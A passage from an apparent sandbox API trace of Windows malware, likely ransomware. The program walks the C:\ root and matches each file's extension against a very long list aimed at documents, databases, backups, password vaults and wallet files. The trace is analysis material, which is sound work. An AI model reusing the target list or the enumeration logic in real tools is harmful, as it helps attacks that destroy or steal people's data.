dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".sys") returned 0x0
	[0157.498] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0x198b0d8f, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x198b0d8f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x198b0d8f, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="MSOCache", cAlternateFileName="")) returned 1
	[0157.499] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x85890a37, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x85890a37, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x6c2d42c9, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x48000000, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="pagefile.sys", cAlternateFileName="")) returned 1
	[0157.499] lstrcmpW (lpString1="pagefile.sys", lpString2="..") returned 1
	[0157.499] lstrcmpW (lpString1="pagefile.sys", lpString2=".") returned 1
	[0157.499] lstrcpyW (in: lpString1=0x18f234, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.499] lstrcatW (in: lpString1="C:\\", lpString2="pagefile.sys" | out: lpString1="C:\\pagefile.sys") returned="C:\\pagefile.sys"
	[0157.499] lstrlenW (lpString="C:\\pagefile.sys") returned 15
	[0157.499] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.499] CharLowerBuffW (in: lpsz="C:\\pagefile.sys", cchLength=0xf | out: lpsz="c:\\pagefile.sys") returned 0xf
	[0157.500] lstrcpyW (in: lpString1=0x18eddc, lpString2="c:\\pagefile.sys" | out: lpString1="c:\\pagefile.sys") returned="c:\\pagefile.sys"
	[0157.500] lstrlenW (lpString="c:\\pagefile.sys") returned 15
	[0157.500] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0157.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.500] StrStrW (lpFirst=".sys", lpSrch=".") returned=".sys"
	[0157.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.500] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".sys") returned 0x0
	[0157.501] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="PerfLogs", cAlternateFileName="")) returned 1
	[0157.501] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xdf5d6eaf, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xdf5d6eaf, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1
	[0157.501] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xaec2cf40, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xaec2cf40, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1
	[0157.501] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xa4af3a5b, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1
	[0157.501] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Recovery", cAlternateFileName="")) returned 1
	[0157.501] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x858b6c65, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x858b6c65, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x6c2d42c9, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="swapfile.sys", cAlternateFileName="")) returned 1
	[0157.502] lstrcmpW (lpString1="swapfile.sys", lpString2="..") returned 1
	[0157.502] lstrcmpW (lpString1="swapfile.sys", lpString2=".") returned 1
	[0157.502] lstrcpyW (in: lpString1=0x18f234, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.502] lstrcatW (in: lpString1="C:\\", lpString2="swapfile.sys" | out: lpString1="C:\\swapfile.sys") returned="C:\\swapfile.sys"
	[0157.502] lstrlenW (lpString="C:\\swapfile.sys") returned 15
	[0157.502] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.502] CharLowerBuffW (in: lpsz="C:\\swapfile.sys", cchLength=0xf | out: lpsz="c:\\swapfile.sys") returned 0xf
	[0157.503] lstrcpyW (in: lpString1=0x18eddc, lpString2="c:\\swapfile.sys" | out: lpString1="c:\\swapfile.sys") returned="c:\\swapfile.sys"
	[0157.503] lstrlenW (lpString="c:\\swapfile.sys") returned 15
	[0157.503] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0157.503] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.503] StrStrW (lpFirst=".sys", lpSrch=".") returned=".sys"
	[0157.503] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.504] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx